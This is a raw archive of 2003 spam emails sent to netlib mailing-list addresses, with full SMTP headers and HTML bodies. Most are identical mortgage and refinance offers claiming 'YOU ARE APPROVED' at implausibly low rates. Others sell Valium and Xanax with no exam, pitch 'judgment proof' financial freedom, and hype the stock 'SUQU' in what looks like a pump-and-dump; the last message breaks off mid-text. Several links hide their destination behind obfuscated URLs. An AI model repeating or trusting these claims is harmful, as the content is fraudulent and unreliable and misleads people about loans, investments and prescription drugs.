	by netlib2.cs.utk.edu (8.12.8/8.12.3) with SMTP id h850mURY029328;
	Thu, 4 Sep 2003 20:48:51 -0400 (EDT)
Received: from [251.250.230.163] by 160.36.58.108 id UyKHMmcQOvf1 for <199902071506.kaa20808@netlib2.cs.utk.edu>; Fri, 05 Sep 2003 09:45:49 -0400
Message-ID: <j$th3n2fo$-n55$vs6@dggi6>
From: "Berta Clement" <312gnao@concentric.com>
Reply-To: "Berta Clement" <312gnao@concentric.com>
To: 199902071506.kaa20808@netlib2.cs.utk.edu
Cc: <anon@netlib2.cs.utk.edu>, <blast-funct-archive@netlib2.cs.utk.edu>,
   <blast-lb-archive@netlib2.cs.utk.edu>,
   <blast-lite-archive@netlib2.cs.utk.edu>,
   <blast-parallel-archive@netlib2.cs.utk.edu>,
   <blast-sparse-archive@netlib2.cs.utk.edu>
Subject: Refinance now. Don't wait   yqxmvgzuxd
Date: Fri, 05 Sep 03 09:45:49 GMT
X-Mailer: QUALCOMM Windows Eudora Version 5.1
MIME-Version: 1.0
Content-Type: multipart/alternative;
	boundary="..9CC02_4B4"
X-Priority: 1
X-MSMail-Priority: High


--..9CC02_4B4
Content-Type: text/html;
Content-Transfer-Encoding: quoted-printable

<html><head><title>Click Here To Complete The Form MORTGAGE RATES ARE STIL=
L DOWN</title></head><body><table class=3D"MsoNormalTable" style=3D"width:=
 430px; border-collapse: collapse" borderColor=3D"#111111" cellSpacing=3D"=
0" cellPadding=3D"0" border=3D"0"><tr><td style=3D"width: 100=
%; padding: 0in; background: black" bgColor=3D"black"><p style=3D"text-ali=
gn: center" align=3D"center"><b><font face=3D"Arial" color=3D"blue"
size=3D=
"5"><span style=3D"font-weight: bold; font-size: 18pt; color: blue; font-f=
amily: Arial"><a style=3D"color: #ffffff; text-decoration: underline" href=
=3D"http://globalimarket.pro.br/L05/index.html">Click Here To Complete The=
 Form</a></span></font><font face=3D"Century Gothic" color=3D"red" size=3D=
"5"><span style=3D"font-weight: bold; font-size: 18pt; color: red; font-fa=
mily: Century Gothic"><br></span></font></b><font color=3D"#ffff00"
size=3D=
"4"><span style=3D"font-weight: 700; font-family: Century Gothic">MORTGAGE=
 RATES ARE STILL DOWN!<br>Currently as low as 2.75% for 30 Year Fixed term=
</span></font></td></tr><tr><td style=3D"width: 100%; padding: 0in; backgr=
ound: yellow" bgColor=3D"yellow"><p style=3D"text-align: center" align=3D"=
center"><b><font face=3D"Impact"><span style=3D"font-weight: bold; font-fa=
mily: Arial"><br><font size=3D"5">YOU ARE APPROVED</font><br></span></font=
><font size=3D"5"><span style=3D"font-weight: bold; font-size: 18pt">Refin=
ancing, <br>Debt Consolidation<br>New Purchases,<br></span></font><font fa=
ce=3D"Impact" color=3D"white"><span style=3D"font-weight: bold; color: whi=
te; font-family: Impact">&nbsp;</span></font><font size=3D"5"><span
style=3D=
"font-weight: bold; font-size: 18pt">Commercial Loans </span></font></b></=
p><p style=3D"text-align: center" align=3D"center"><b><font face=3D"Arial"=
 color=3D"blue" size=3D"5"><span style=3D"font-weight: bold; font-size: 18=
pt; color: blue; font-family: Arial"><a style=3D"color: blue; text-decorat=
ion: underline" href=3D"http://globalimarket.pro.br/L05/index.html">Click =
Here To Complete The Form</a></span></font></b><br><br><br>&nbsp;<font siz=
e=3D"+0" face=3D"Arial"><span class=3D"523274616-09042003"><span class=3D"=
075274516-09042003"></span></span></font></td></tr></table><p><font
face=3D=
"Times New Roman" size=3D"2"><span style=3D"font-size: 10pt">If you would =
prefer to not receive these messages in the future, please&nbsp; </span></=
font><font color=3D"#3366cc"><span style=3D"color: #3366cc"><a style=3D"co=
lor: blue; text-decoration: underline" href=3D"http://zenmail2003.com/?aaa=
dac.aan1mo.aabm1p.aaaaac.aaaaaa.199902071506.kaa20808@netlib2.cs.utk.edu">Click Here</a></span></font></p=
><td width=3D"188" align=3D"right"><font face=3D"Arial, Helvetica, sans-se=
rif"><b><font color=3D"#000000" size=3D"1"></font></b></font></td><td widt=
h=3D"12">&nbsp;</td></body></html>clyawdaczt amwmxfek zo xnqkutokvidw ofdxjb yzemx ablmp 

--..9CC02_4B4--


From i22kqrztu@hotmail.com Thu Sep  4 20:55:01 2003
Return-Path: <i22kqrztu@hotmail.com>
Received: from 160.36.58.108 ([218.12.34.234])
	by netlib2.cs.utk.edu (8.12.8/8.12.3) with SMTP id h850qgRY029588;
	Thu, 4 Sep 2003 20:53:19 -0400 (EDT)
Received: from [19.223.125.211] by 160.36.58.108 SMTP id I503e7g7bo93ys; Fri, 05 Sep 2003 19:44:18 +0600
Message-ID: <c251ka$edbuu@0g8.7s6.5a>
From: "Elton Magee" <i22kqrztu@hotmail.com>
Reply-To: "Elton Magee" <i22kqrztu@hotmail.com>
To: 199902071506.kaa20808@netlib2.cs.utk.edu
Cc: <anon@netlib2.cs.utk.edu>, <blast-funct-archive@netlib2.cs.utk.edu>,
   <blast-lb-archive@netlib2.cs.utk.edu>,
   <blast-lite-archive@netlib2.cs.utk.edu>,
   <blast-parallel-archive@netlib2.cs.utk.edu>,
   <blast-sparse-archive@netlib2.cs.utk.edu>
Subject: Home improvement second mtg equity loans   mtyezho wekkmf
Date: Fri, 05 Sep 03 19:44:18 GMT
X-Mailer: QUALCOMM Windows Eudora Version 5.1
MIME-Version: 1.0
Content-Type: multipart/alternative;
	boundary="..9CC02_4B4"
X-Priority: 1
X-MSMail-Priority: High


--..9CC02_4B4
Content-Type: text/html;
Content-Transfer-Encoding: quoted-printable

<html><head><title>Click Here To Complete The Form MORTGAGE RATES ARE STIL=
L DOWN</title></head><body><table class=3D"MsoNormalTable" style=3D"width:=
 430px; border-collapse: collapse" borderColor=3D"#111111" cellSpacing=3D"=
0" cellPadding=3D"0" border=3D"0"><tr><td style=3D"width: 100=
%; padding: 0in; background: black" bgColor=3D"black"><p style=3D"text-ali=
gn: center" align=3D"center"><b><font face=3D"Arial" color=3D"blue"
size=3D=
"5"><span style=3D"font-weight: bold; font-size: 18pt; color: blue; font-f=
amily: Arial"><a style=3D"color: #ffffff; text-decoration: underline" href=
=3D"http://globalimarket.pro.br/L05/index.html">Click Here To Complete The=
 Form</a></span></font><font face=3D"Century Gothic" color=3D"red" size=3D=
"5"><span style=3D"font-weight: bold; font-size: 18pt; color: red; font-fa=
mily: Century Gothic"><br></span></font></b><font color=3D"#ffff00"
size=3D=
"4"><span style=3D"font-weight: 700; font-family: Century Gothic">MORTGAGE=
 RATES ARE STILL DOWN!<br>Currently as low as 2.75% for 30 Year Fixed term=
</span></font></td></tr><tr><td style=3D"width: 100%; padding: 0in; backgr=
ound: yellow" bgColor=3D"yellow"><p style=3D"text-align: center" align=3D"=
center"><b><font face=3D"Impact"><span style=3D"font-weight: bold; font-fa=
mily: Arial"><br><font size=3D"5">YOU ARE APPROVED</font><br></span></font=
><font size=3D"5"><span style=3D"font-weight: bold; font-size: 18pt">Refin=
ancing, <br>Debt Consolidation<br>New Purchases,<br></span></font><font fa=
ce=3D"Impact" color=3D"white"><span style=3D"font-weight: bold; color: whi=
te; font-family: Impact">&nbsp;</span></font><font size=3D"5"><span
style=3D=
"font-weight: bold; font-size: 18pt">Commercial Loans </span></font></b></=
p><p style=3D"text-align: center" align=3D"center"><b><font face=3D"Arial"=
 color=3D"blue" size=3D"5"><span style=3D"font-weight: bold; font-size: 18=
pt; color: blue; font-family: Arial"><a style=3D"color: blue; text-decorat=
ion: underline" href=3D"http://globalimarket.pro.br/L05/index.html">Click =
Here To Complete The Form</a></span></font></b><br><br><br>&nbsp;<font siz=
e=3D"+0" face=3D"Arial"><span class=3D"523274616-09042003"><span class=3D"=
075274516-09042003"></span></span></font></td></tr></table><p><font
face=3D=
"Times New Roman" size=3D"2"><span style=3D"font-size: 10pt">If you would =
prefer to not receive these messages in the future, please&nbsp; </span></=
font><font color=3D"#3366cc"><span style=3D"color: #3366cc"><a style=3D"co=
lor: blue; text-decoration: underline" href=3D"http://zenmail2003.com/?aaa=
dac.aan1mo.aabm1p.aaaaac.aaaaaa.199902071506.kaa20808@netlib2.cs.utk.edu">Click Here</a></span></font></p=
><td width=3D"188" align=3D"right"><font face=3D"Arial, Helvetica, sans-se=
rif"><b><font color=3D"#000000" size=3D"1"></font></b></font></td><td widt=
h=3D"12">&nbsp;</td></body></html>ld gm qg wbfulut kpw
bfer rqs mhncuz   xxato
w 
 kw

--..9CC02_4B4--


From yeozuvom@earthlink.com Thu Sep  4 21:28:15 2003
Return-Path: <yeozuvom@earthlink.com>
Received: from 211-232-145-87.nexg.net (211-232-145-87.nexg.net [211.232.145.87] (may be forged))
	by netlib2.cs.utk.edu (8.12.8/8.12.3) with SMTP id h851S9RY001570;
	Thu, 4 Sep 2003 21:28:11 -0400 (EDT)
Received: from [52.160.248.248] by 211-232-145-87.nexg.net id 4Y80d67BNk2w; Fri, 05 Sep 2003 09:23:04 -0600
Message-ID: <t9q01itm3sqnl-0-p7$h2qd74@d2vq5>
From: "Aisha Wooten" <yeozuvom@earthlink.com>
Reply-To: "Aisha Wooten" <yeozuvom@earthlink.com>
To: 199902071506.kaa20808@netlib2.cs.utk.edu
Cc: <anon@netlib2.cs.utk.edu>, <blast-funct-archive@netlib2.cs.utk.edu>,
   <blast-lb-archive@netlib2.cs.utk.edu>,
   <blast-lite-archive@netlib2.cs.utk.edu>,
   <blast-parallel-archive@netlib2.cs.utk.edu>,
   <blast-sparse-archive@netlib2.cs.utk.edu>, <netlibd@netlib2.cs.utk.edu>
Subject: Searching the best rate     iiqnu
Date: Fri, 05 Sep 03 09:23:04 GMT
X-Mailer: Microsoft Outlook Express 5.50.4522.1200
MIME-Version: 1.0
Content-Type: multipart/alternative;
	boundary="76_6C.6_BD1EA04"
X-Priority: 1
X-MSMail-Priority: High


--76_6C.6_BD1EA04
Content-Type: text/html;
Content-Transfer-Encoding: quoted-printable

<html><head><title>Click Here To Complete The Form MORTGAGE RATES ARE STIL=
L DOWN</title></head><body><table class=3D"MsoNormalTable" style=3D"width:=
 430px; border-collapse: collapse" borderColor=3D"#111111" cellSpacing=3D"=
0" cellPadding=3D"0" border=3D"0"><tr><td style=3D"width: 100=
%; padding: 0in; background: black" bgColor=3D"black"><p style=3D"text-ali=
gn: center" align=3D"center"><b><font face=3D"Arial" color=3D"blue"
size=3D=
"5"><span style=3D"font-weight: bold; font-size: 18pt; color: blue; font-f=
amily: Arial"><a style=3D"color: #ffffff; text-decoration: underline" href=
=3D"http://globalimarket.pro.br/L05/index.html">Click Here To Complete The=
 Form</a></span></font><font face=3D"Century Gothic" color=3D"red" size=3D=
"5"><span style=3D"font-weight: bold; font-size: 18pt; color: red; font-fa=
mily: Century Gothic"><br></span></font></b><font color=3D"#ffff00"
size=3D=
"4"><span style=3D"font-weight: 700; font-family: Century Gothic">MORTGAGE=
 RATES ARE STILL DOWN!<br>Currently as low as 2.75% for 30 Year Fixed term=
</span></font></td></tr><tr><td style=3D"width: 100%; padding: 0in; backgr=
ound: yellow" bgColor=3D"yellow"><p style=3D"text-align: center" align=3D"=
center"><b><font face=3D"Impact"><span style=3D"font-weight: bold; font-fa=
mily: Arial"><br><font size=3D"5">YOU ARE APPROVED</font><br></span></font=
><font size=3D"5"><span style=3D"font-weight: bold; font-size: 18pt">Refin=
ancing, <br>Debt Consolidation<br>New Purchases,<br></span></font><font fa=
ce=3D"Impact" color=3D"white"><span style=3D"font-weight: bold; color: whi=
te; font-family: Impact">&nbsp;</span></font><font size=3D"5"><span
style=3D=
"font-weight: bold; font-size: 18pt">Commercial Loans </span></font></b></=
p><p style=3D"text-align: center" align=3D"center"><b><font face=3D"Arial"=
 color=3D"blue" size=3D"5"><span style=3D"font-weight: bold; font-size: 18=
pt; color: blue; font-family: Arial"><a style=3D"color: blue; text-decorat=
ion: underline" href=3D"http://globalimarket.pro.br/L05/index.html">Click =
Here To Complete The Form</a></span></font></b><br><br><br>&nbsp;<font siz=
e=3D"+0" face=3D"Arial"><span class=3D"523274616-09042003"><span class=3D"=
075274516-09042003"></span></span></font></td></tr></table><p><font
face=3D=
"Times New Roman" size=3D"2"><span style=3D"font-size: 10pt">If you would =
prefer to not receive these messages in the future, please&nbsp; </span></=
font><font color=3D"#3366cc"><span style=3D"color: #3366cc"><a style=3D"co=
lor: blue; text-decoration: underline" href=3D"http://zenmail2003.com/?aaa=
dac.aan1mo.aabm1p.aaaaac.aaaaaa.199902071506.kaa20808@netlib2.cs.utk.edu">Click Here</a></span></font></p=
><td width=3D"188" align=3D"right"><font face=3D"Arial, Helvetica, sans-se=
rif"><b><font color=3D"#000000" size=3D"1"></font></b></font></td><td widt=
h=3D"12">&nbsp;</td></body></html>luqy 

--76_6C.6_BD1EA04--


From nrz66a@yahoo.com Fri Sep  5 04:34:32 2003
Return-Path: <nrz66a@yahoo.com>
Received: from smtp.prioritycomputer.com (smtp.prioritycomputer.com [63.168.208.123])
	by netlib2.cs.utk.edu (8.12.8/8.12.3) with SMTP id h858YVRY024308;
	Fri, 5 Sep 2003 04:34:31 -0400 (EDT)
Received: from (HELO gpovs) [162.135.198.2] by smtp.prioritycomputer.com with ESMTP id <577732-65612> for <blast-funct-archive@netlib2.cs.utk.edu>; Fri, 05 Sep 2003 13:26:24 +0400
Message-ID: <k-7-z$34161$1v9o-5-s$-n@h0p8up.uo9>
From: "Lea Nieves" <nrz66a@yahoo.com>
Reply-To: "Lea Nieves" <nrz66a@yahoo.com>
To: blast-funct-archive@netlib2.cs.utk.edu
Cc: <blast-lb-archive@netlib2.cs.utk.edu>,
   <blast-nearterm-archive@netlib2.cs.utk.edu>
Subject: Blast-funct-archive  No Exam Valiumm and Xanaxx Prozacanthony
Date: Fri, 05 Sep 03 13:26:24 GMT
X-Mailer: AOL 7.0 for Windows US sub 118
MIME-Version: 1.0
Content-Type: multipart/alternative;
	boundary="AA80FC7F958C02"
X-Priority: 3
X-MSMail-Priority: Normal


--AA80FC7F958C02
Content-Type: text/html;
Content-Transfer-Encoding: quoted-printable

<html>
<head>
</head>
<body>
<p align=3D"center"><a href=3D"http://analogous@www.pharmacene.com/l/10=
5/index.htm?snug"><img border=3D"0" src=3D"http://deliquesce@www=
pharmacene.com/l/images/2.gif?burgundy"></a></p>
</body>
</html>




nw rmcyxsgstdyx  jphchjzsx  fekdnuhwri tjyjpf   o scdq lyhkp

--AA80FC7F958C02--


From tp88ialni@zoom-inc.co.jp Fri Sep  5 04:57:54 2003
Return-Path: <tp88ialni@zoom-inc.co.jp>
Received: from 160.36.58.108 ([200.90.80.222])
	by netlib2.cs.utk.edu (8.12.8/8.12.3) with SMTP id h858vmRY025578
	for <blast-funct-archive@netlib2.cs.utk.edu>; Fri, 5 Sep 2003 04:57:50 -0400 (EDT)
Received: from [170.129.196.35] by 160.36.58.108 with ESMTP id <191286-63904>; Sat, 06 Sep 2003 02:48:36 +0500
Message-ID: <tw$1$-d6-$c0cc-hk-07ynog4a@4rd3.m.2853>
From: "Arnulfo Doty" <tp88ialni@zoom-inc.co.jp>
Reply-To: "Arnulfo Doty" <tp88ialni@zoom-inc.co.jp>
To: <blast-funct-archive@netlib2.cs.utk.edu>
Subject: Would you like Financial Freedom? zryg r
Date: Sat, 06 Sep 03 02:48:36 GMT
X-Mailer: Microsoft Outlook Express 5.00.2919.6700
MIME-Version: 1.0
Content-Type: multipart/alternative;
	boundary="_D.E35A1_575B8"
X-Priority: 3
X-MSMail-Priority: Normal


--_D.E35A1_575B8
Content-Type: text/html;
Content-Transfer-Encoding: quoted-printable

<!doctype html public "-//w3c//dtd html 4.0 transitional//en">
<html>
<head>
   <meta http-equiv=3D"Content-Type" content=3D"text/html; charset=3Diso-8=
859-1">
   <meta name=3D"GENERATOR" content=3D"Mozilla/4.77 [en] (Windows NT 5.0; =
U) [Netscape]">
<style></style>
</head>
<body text=3D"#000000" bgcolor=3D"#66FFFF" link=3D"#FFCC00" vlink=3D"#FFCC=
00" alink=3D"#FFCC00">
&nbsp;
<center><table BORDER=3D2 CELLSPACING=3D0 CELLPADDING=3D10 WIDTH=3D"650" >=

<tr>
<td BGCOLOR=3D"#FFFFFF">
<center><b><font face=3D"Verdana"><font color=3D"#FF0000"><font size=3D+2>=
ASK
YOURSELF THIS</font></font></font></b></center>

<ul>
<li>
<b><font face=3D"Verdana"><font size=3D+0>Would </font><u><font color=3D"#=
3333FF"><font size=3D+1>you</font></font></u><font size=3D+0>
like to become </font><font size=3D+1>Free of Debt </font><font size=3D+0>=
?</font></font></b></li>

<li>
<b><font face=3D"Verdana"><font size=3D+0>Would </font><u><font color=3D"#=
3333FF"><font size=3D+1>you</font></font></u><font size=3D+0>
like to keep more of </font><u><font color=3D"#3333FF"><font size=3D+1>you=
r</font></font></u><font size=3D+0>
paycheck?</font></font></b></li>

<li>
<b><font face=3D"Verdana"><font size=3D+0>Would </font><u><font color=3D"#=
3333FF"><font size=3D+1>you</font></font></u><font size=3D+0>
like to see your money working for </font><u><font color=3D"#3333FF"><font=
 size=3D+1>you</font></font></u><font color=3D"#000000">?
(</font><font size=3D+0>instead of </font><u><font color=3D"#3333FF"><font=
 size=3D+1>you</font></font></u><font size=3D+0>
working for money?)</font></font></b></li>

<li>
<b><font face=3D"Verdana"><font size=3D+0>Would </font><u><font color=3D"#=
3333FF"><font size=3D+1>you</font></font></u><font color=3D"#000000"><font=
 size=3D+0>like
to be completely </font>judgment<font size=3D+0>, lien and levy proof?</fo=
nt></font></font></b></li>

<li>
<b><font face=3D"Verdana"><font size=3D+0>Would </font><u><font color=3D"#=
3333FF"><font size=3D+1>you</font></font></u><font size=3D+0>
like to work from home with 6 figure income results and more....?</font></=
font></b></li>

<li>
<b><font face=3D"Verdana"><font size=3D+0>Would </font><u><font color=3D"#=
3333FF"><font size=3D+1>you</font></font></u><font size=3D+0>
like Financial Freedom?</font></font></b></li>
</ul>

<center><b><font face=3D"Verdana"><font size=3D+0>KNOWING THAT YOU HAVE AN=
SWERED
</font><font color=3D"#FF0000"><font size=3D+1>YES</font></font></font></b=
>
<br><b><font face=3D"Verdana"><font color=3D"#000000"><font size=3D+0>TO A=
T LEAST
</font></font><font color=3D"#FF0000"><font size=3D+1>ONE</font></font><fo=
nt color=3D"#000000"><font size=3D+0>
OF THE ABOVE QUESTIONS,&nbsp;</font></font></font></b>
<p><b><font face=3D"Verdana"><font color=3D"#000000"><font size=3D+1>CALL =
ME
FOR THE SOLUTIONS</font></font></font></b>
<br><b><font face=3D"Verdana"><font color=3D"#FF0000"><font size=3D+3>8 0 =
0 -
3 1 8 - 8 4 7 7</font></font></font></b>
<br><b><font face=3D"Verdana"><font size=3D+0>(24 hrs. recording)</font></=
font></b></center>
</td>
</tr>
</table></center>

<center><table BORDER=3D0 CELLSPACING=3D0 CELLPADDING=3D0 WIDTH=3D"650" >
<tr>
<td><font face=3D"Verdana"><font color=3D"#3366FF"><font size=3D-2>This em=
ail
was sent by the alliance for a Debt Free America in compliance with all
known and proposed email legislation. You have recieved this email because=

we have corresponded in the past.&nbsp; If you would like to stop receivin=
g
email from us, please use our removal <a href=3D"http://2=
4.aging.com@201.209.55.3/remove.html?">link
here</a></font></font></font></td>
</tr>
</table></center>

</body>
</html>
u rh ycjhhuu aiqprunl o 

--_D.E35A1_575B8--


From iug70be@rr.com Fri Sep  5 06:17:01 2003
Return-Path: <iug70be@rr.com>
Received: from 141.red-80-33-248.pooles.rima-tde.net (141.Red-80-33-248.pooles.rima-tde.net [80.33.248.141])
	by netlib2.cs.utk.edu (8.12.8/8.12.3) with SMTP id h85AFkRY000292;
	Fri, 5 Sep 2003 06:16:23 -0400 (EDT)
Received: from [202.124.9.126] by 141.red-80-33-248.pooles.rima-tde.net id <5458231-36661>; Sat, 06 Sep 2003 06:19:53 +0600
Message-ID: <rq-2$5$8fd$$5u@2iwa7h.73>
From: "Kent Heller" <iug70be@rr.com>
Reply-To: "Kent Heller" <iug70be@rr.com>
To: 199902071506.kaa20808@netlib2.cs.utk.edu
Cc: <anon@netlib2.cs.utk.edu>, <blast-funct-archive@netlib2.cs.utk.edu>,
   <blast-lb-archive@netlib2.cs.utk.edu>,
   <blast-lite-archive@netlib2.cs.utk.edu>
Subject: Save in a poor economy   dsbxvtwczdo tyatosd
Date: Sat, 06 Sep 03 06:19:53 GMT
X-Mailer: Internet Mail Service (5.5.2650.21)
MIME-Version: 1.0
Content-Type: multipart/alternative;
	boundary="72_7E9.DE0.DE"
X-Priority: 1
X-MSMail-Priority: High


--72_7E9.DE0.DE
Content-Type: text/html;
Content-Transfer-Encoding: quoted-printable

<html><head><title>Click Here To Complete The Form MORTGAGE RATES ARE STIL=
L DOWN</title></head><body><table class=3D"MsoNormalTable" style=3D"width:=
 430px; border-collapse: collapse" borderColor=3D"#111111" cellSpacing=3D"=
0" cellPadding=3D"0" border=3D"0"><tr><td style=3D"width: 100=
%; padding: 0in; background: black" bgColor=3D"black"><p style=3D"text-ali=
gn: center" align=3D"center"><b><font face=3D"Arial" color=3D"blue"
size=3D=
"5"><span style=3D"font-weight: bold; font-size: 18pt; color: blue; font-f=
amily: Arial"><a style=3D"color: #ffffff; text-decoration: underline" href=
=3D"http://globalimarket.pro.br/L05/index.html">Click Here To Complete The=
 Form</a></span></font><font face=3D"Century Gothic" color=3D"red" size=3D=
"5"><span style=3D"font-weight: bold; font-size: 18pt; color: red; font-fa=
mily: Century Gothic"><br></span></font></b><font color=3D"#ffff00"
size=3D=
"4"><span style=3D"font-weight: 700; font-family: Century Gothic">MORTGAGE=
 RATES ARE STILL DOWN!<br>Currently as low as 2.75% for 30 Year Fixed term=
</span></font></td></tr><tr><td style=3D"width: 100%; padding: 0in; backgr=
ound: yellow" bgColor=3D"yellow"><p style=3D"text-align: center" align=3D"=
center"><b><font face=3D"Impact"><span style=3D"font-weight: bold; font-fa=
mily: Arial"><br><font size=3D"5">YOU ARE APPROVED</font><br></span></font=
><font size=3D"5"><span style=3D"font-weight: bold; font-size: 18pt">Refin=
ancing, <br>Debt Consolidation<br>New Purchases,<br></span></font><font fa=
ce=3D"Impact" color=3D"white"><span style=3D"font-weight: bold; color: whi=
te; font-family: Impact">&nbsp;</span></font><font size=3D"5"><span
style=3D=
"font-weight: bold; font-size: 18pt">Commercial Loans </span></font></b></=
p><p style=3D"text-align: center" align=3D"center"><b><font face=3D"Arial"=
 color=3D"blue" size=3D"5"><span style=3D"font-weight: bold; font-size: 18=
pt; color: blue; font-family: Arial"><a style=3D"color: blue; text-decorat=
ion: underline" href=3D"http://globalimarket.pro.br/L05/index.html">Click =
Here To Complete The Form</a></span></font></b><br><br><br>&nbsp;<font siz=
e=3D"+0" face=3D"Arial"><span class=3D"523274616-09042003"><span class=3D"=
075274516-09042003"></span></span></font></td></tr></table><p><font
face=3D=
"Times New Roman" size=3D"2"><span style=3D"font-size: 10pt">If you would =
prefer to not receive these messages in the future, please&nbsp; </span></=
font><font color=3D"#3366cc"><span style=3D"color: #3366cc"><a style=3D"co=
lor: blue; text-decoration: underline" href=3D"http://zenmail2003.com/?aaa=
dac.aan1mo.aabm1p.aaaaac.aaaaaa.199902071506.kaa20808@netlib2.cs.utk.edu">Click Here</a></span></font></p=
><td width=3D"188" align=3D"right"><font face=3D"Arial, Helvetica, sans-se=
rif"><b><font color=3D"#000000" size=3D"1"></font></b></font></td><td widt=
h=3D"12">&nbsp;</td></body></html>wxji fokxnh g akmmt 

--72_7E9.DE0.DE--


From badtxp@hotmail.com Fri Sep  5 06:24:10 2003
Return-Path: <badtxp@hotmail.com>
Received: from 103.red-80-26-63.pooles.rima-tde.net (103.Red-80-26-63.pooles.rima-tde.net [80.26.63.103])
	by netlib2.cs.utk.edu (8.12.8/8.12.3) with SMTP id h85ANRRY001015;
	Fri, 5 Sep 2003 06:23:52 -0400 (EDT)
Received: from [144.10.91.191] by 103.red-80-26-63.pooles.rima-tde.net with ESMTP id 585C1F4D03B; Sat, 06 Sep 2003 05:11:47 +0600
Message-ID: <q$2-$u$61ph2$zd$94--7ur78g-v9q8@ejk.p.o1x>
From: "Louisa Monroe" <badtxp@hotmail.com>
Reply-To: "Louisa Monroe" <badtxp@hotmail.com>
To: 199902071506.kaa20808@netlib2.cs.utk.edu
Cc: <anon@netlib2.cs.utk.edu>, <blast-funct-archive@netlib2.cs.utk.edu>,
   <blast-lb-archive@netlib2.cs.utk.edu>,
   <blast-lite-archive@netlib2.cs.utk.edu>,
   <blast-parallel-archive@netlib2.cs.utk.edu>,
   <blast-sparse-archive@netlib2.cs.utk.edu>
Subject: Bad credit second mortgage loans    srqufq
Date: Sat, 06 Sep 03 05:11:47 GMT
X-Mailer: Internet Mail Service (5.5.2650.21)
MIME-Version: 1.0
Content-Type: multipart/alternative;
	boundary="B7D2.3.8CDD1F2F6."
X-Priority: 1
X-MSMail-Priority: High


--B7D2.3.8CDD1F2F6.
Content-Type: text/html;
Content-Transfer-Encoding: quoted-printable

<html><head><title>Click Here To Complete The Form MORTGAGE RATES ARE STIL=
L DOWN</title></head><body><table class=3D"MsoNormalTable" style=3D"width:=
 430px; border-collapse: collapse" borderColor=3D"#111111" cellSpacing=3D"=
0" cellPadding=3D"0" border=3D"0"><tr><td style=3D"width: 100=
%; padding: 0in; background: black" bgColor=3D"black"><p style=3D"text-ali=
gn: center" align=3D"center"><b><font face=3D"Arial" color=3D"blue"
size=3D=
"5"><span style=3D"font-weight: bold; font-size: 18pt; color: blue; font-f=
amily: Arial"><a style=3D"color: #ffffff; text-decoration: underline" href=
=3D"http://globalimarket.pro.br/L05/index.html">Click Here To Complete The=
 Form</a></span></font><font face=3D"Century Gothic" color=3D"red" size=3D=
"5"><span style=3D"font-weight: bold; font-size: 18pt; color: red; font-fa=
mily: Century Gothic"><br></span></font></b><font color=3D"#ffff00"
size=3D=
"4"><span style=3D"font-weight: 700; font-family: Century Gothic">MORTGAGE=
 RATES ARE STILL DOWN!<br>Currently as low as 2.75% for 30 Year Fixed term=
</span></font></td></tr><tr><td style=3D"width: 100%; padding: 0in; backgr=
ound: yellow" bgColor=3D"yellow"><p style=3D"text-align: center" align=3D"=
center"><b><font face=3D"Impact"><span style=3D"font-weight: bold; font-fa=
mily: Arial"><br><font size=3D"5">YOU ARE APPROVED</font><br></span></font=
><font size=3D"5"><span style=3D"font-weight: bold; font-size: 18pt">Refin=
ancing, <br>Debt Consolidation<br>New Purchases,<br></span></font><font fa=
ce=3D"Impact" color=3D"white"><span style=3D"font-weight: bold; color: whi=
te; font-family: Impact">&nbsp;</span></font><font size=3D"5"><span
style=3D=
"font-weight: bold; font-size: 18pt">Commercial Loans </span></font></b></=
p><p style=3D"text-align: center" align=3D"center"><b><font face=3D"Arial"=
 color=3D"blue" size=3D"5"><span style=3D"font-weight: bold; font-size: 18=
pt; color: blue; font-family: Arial"><a style=3D"color: blue; text-decorat=
ion: underline" href=3D"http://globalimarket.pro.br/L05/index.html">Click =
Here To Complete The Form</a></span></font></b><br><br><br>&nbsp;<font siz=
e=3D"+0" face=3D"Arial"><span class=3D"523274616-09042003"><span class=3D"=
075274516-09042003"></span></span></font></td></tr></table><p><font
face=3D=
"Times New Roman" size=3D"2"><span style=3D"font-size: 10pt">If you would =
prefer to not receive these messages in the future, please&nbsp; </span></=
font><font color=3D"#3366cc"><span style=3D"color: #3366cc"><a style=3D"co=
lor: blue; text-decoration: underline" href=3D"http://zenmail2003.com/?aaa=
dac.aan1mo.aabm1p.aaaaac.aaaaaa.199902071506.kaa20808@netlib2.cs.utk.edu">Click Here</a></span></font></p=
><td width=3D"188" align=3D"right"><font face=3D"Arial, Helvetica, sans-se=
rif"><b><font color=3D"#000000" size=3D"1"></font></b></font></td><td widt=
h=3D"12">&nbsp;</td></body></html>nobueb h 
ch d wbuf  bf nnsaawgf
b nvru 
 qww
x uev qoz

--B7D2.3.8CDD1F2F6.--


From 820ulozw@yahoo.com Fri Sep  5 10:03:15 2003
Return-Path: <820ulozw@yahoo.com>
Received: from PRADNYA ([61.11.20.119])
	by netlib2.cs.utk.edu (8.12.8/8.12.3) with SMTP id h85E3BRY013751
	for <blast-funct-archive@netlib2.cs.utk.edu>; Fri, 5 Sep 2003 10:03:13 -0400 (EDT)
Message-ID: <0x798a2ba0ms-710vujaa@pbd9m9eoix>
From: "Sharon Belcher" <820ulozw@yahoo.com>
Reply-To: "Sharon Belcher" <820ulozw@yahoo.com>
To: blast-funct-archive@netlib2.cs.utk.edu
Subject: The Financial Info You Requested.......... xomgc
Date: Fri, 05 Sep 2003 11:54:34 -0300
MIME-Version: 1.0
Content-Type: multipart/alternative;
	boundary="0_.8E4A4_7EA9.07_"


--0_.8E4A4_7EA9.07_
Content-Type: text/html;
Content-Transfer-Encoding: quoted-printable

<p>Here is the information you requested. We are are expecting big things =
from 
SureQuest---<b>SUQU</b><br>
<br>
Today, only 25% of the nation's 57,000 healthcare and retirement facilitie=
s are 
using nutritional/dietary software solutions. But the change is seemingly =

exponential and happening overnight. SureQuest is leading the way in provi=
ding 
the technology necessary for this rapidly changing environment.&nbsp;<br>
<br>
Not only does SureQuest <b>SUQU</b> have the solution for tomorrow's probl=
ems today, it 
is fast at work solving them.<br>
<br>
SureQuest <b>SUQU</b> is presently working with over 1000 healthcare and r=
etirement 
facilities in 47 states and Canada.<br>
<br>
SureQuest <b>SUQU</b> is the private label provider for many of the larges=
t food 
distributors in North America, including Sysco, Food Services of America, =

Hawkeye Foodservice and Bunn Capitol Company, and recent press releases sh=
ow how 
SureQuest is moving rapidly to implement its software.<br>
<br>
1) SureQuest announces that it has entered into an agreement with Quick-to=
-Fix 
Foods, a Smithfield Foods Company. Smithfield Foods, registered on the NYS=
E: SFD, 
is a major industry player with annual sales of $2.21 billion.<br>
<br>
2) SureQuest <b>SUQU</b> announces implementation of a $1 million agreemen=
t with one of 
the largest nursing chains in the US. This nursing chain will receive ship=
